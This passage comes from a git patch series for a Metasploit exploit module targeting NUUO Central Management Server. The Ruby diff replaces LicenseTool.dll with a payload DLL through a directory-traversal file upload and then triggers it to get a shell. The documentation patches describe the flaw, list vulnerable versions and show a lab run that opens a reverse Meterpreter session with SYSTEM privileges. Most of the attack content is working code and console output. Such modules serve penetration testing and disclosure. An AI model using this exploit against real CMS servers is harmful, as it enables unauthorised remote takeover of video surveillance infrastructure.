Download and upload a backup of LicenseTool.dll, so that we can restore it at post # and not nuke the CMS installation. @dll = rand_text_alpha(12) print_status("Backing up LicenseTool.dll to #{@dll}") - dll_data = nucs_download_file("LicenseTool.dll") + dll_data = nucs_download_file('LicenseTool.dll') nucs_upload_file(@dll, dll_data) - print_status("Uploading payload...") - nucs_upload_file("LicenseTool.dll", generate_payload_dll) + print_status('Uploading payload...') + nucs_upload_file('LicenseTool.dll', generate_payload_dll) - print_status("Sleeping 15 seconds...") - sleep 15 + print_status('Sleeping 15 seconds...') + Rex.sleep(15) - print_status("Sending SENDLICFILE request, shell incoming!") + print_status('Sending SENDLICFILE request, shell incoming!') license_data = rand_text_alpha(50..350) - nucs_send_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic", - "Content-Length: " + license_data.length.to_s], license_data) + nucs_send_msg(['SENDLICFILE', "FileName: #{rand_text_alpha(3..11)}.lic", + 'Content-Length: ' + license_data.length.to_s], license_data) end end From 4d5bad7c9672a33106e5d8688484c8a7699a2b2b Mon Sep 17 00:00:00 2001 From: Jacob Robles Date: Tue, 19 Feb 2019 12:20:10 -0600 Subject: [PATCH 19/20] Update doc --- .../exploit/windows/nuuo/nuuo_cms_fu.md | 21 +++++++++++++++++-- 1 file changed, 19 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md index 9ef8afed95..e5fde4acf2 100644 --- a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md +++ b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md @@ -1,13 +1,18 @@ -# Nuuo CMS Authenticated Arbitrary File Upload +## Description + +Nuuo CMS Authenticated Arbitrary File Upload The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the CMS Server. An example is below: +``` COMMITCONFIG NUCM/1.0 User-Session-No: Filename: FileType: Content-Lenght: + +``` The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\) characters. Therefore, this function can be abused to overwrite any files in the installation drive of CMS Server. @@ -16,7 +21,10 @@ This vulnerability is exploitable in CMS versions up to and including v2.4. This module will either use a provided session number (which can be guessed with an auxiliary module) or attempt to login using a provided username and password - it will also try the default credentials if nothing is provided. -## The following versions were tested: +## Vulnerable Application + +[NUUO Central Management Server (CMS): all versions below 2.5](http://d1.nuuo.com/NUUO/CMS/) + - 1.5.2 OK - 2.1.0 OK - 2.3.2 OK @@ -25,6 +33,15 @@ This module will either use a provided session number (which can be guessed with - 2.9.0 FAIL - 2.10.0 FAIL +## Scenarios + +### Testing on Windows 10 Pro x64 running NCS Server 2.4.0 + +``` +``` + ## References + https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02 + https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt From be7ecd85fb22086592fbad47e1627737fc006e68 Mon Sep 17 00:00:00 2001 From: Jacob Robles Date: Tue, 19 Feb 2019 12:23:49 -0600 Subject: [PATCH 20/20] Doc update --- .../exploit/windows/nuuo/nuuo_cms_fu.md | 32 ++++++++++++++++++- 1 file changed, 31 insertions(+), 1 deletion(-) diff --git a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md index e5fde4acf2..26c0e18498 100644 --- a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md +++ b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md @@ -20,7 +20,6 @@ This vulnerability is exploitable in CMS versions up to and including v2.4. This module will either use a provided session number (which can be guessed with an auxiliary module) or attempt to login using a provided username and password - it will also try the default credentials if nothing is provided. - ## Vulnerable Application [NUUO Central Management Server (CMS): all versions below 2.5](http://d1.nuuo.com/NUUO/CMS/) @@ -38,6 +37,37 @@ This module will either use a provided session number (which can be guessed with ### Testing on Windows 10 Pro x64 running NCS Server 2.4.0 ``` +msf5 exploit(windows/nuuo/nuuo_cms_fu) > set rhosts 172.22.222.200 +rhosts => 172.22.222.200 +msf5 exploit(windows/nuuo/nuuo_cms_fu) > set verbose true +verbose => true +msf5 exploit(windows/nuuo/nuuo_cms_fu) > exploit + +[*] Started reverse TCP handler on 172.22.222.136:4444 +[*] 172.22.222.200:5180 - Backing up LicenseTool.dll to TQzixBdpOiRG +[*] 172.22.222.200:5180 - Uploading payload... +[*] 172.22.222.200:5180 - Sleeping 15 seconds... +[*] 172.22.222.200:5180 - Sending SENDLICFILE request, shell incoming! +[*] Sending stage (179779 bytes) to 172.22.222.200 +[*] Meterpreter session 3 opened (172.22.222.136:4444 -> 172.22.222.200:49674) at 2019-02-19 05:46:51 -0600 + +meterpreter > +[!] 172.22.222.200:5180 - Please wait a bit while we clean up +[+] 172.22.222.200:5180 - Successfully restored LicenseTool.dll! +...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). +[+] 172.22.222.200:5180 - We should have SYSTEM now, enjoy your shell! + +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +meterpreter > sysinfo +Computer : DESKTOP-IPOGIJR +OS : Windows 10 (Build 17763). +Architecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x86/windows +meterpreter > ``` ## References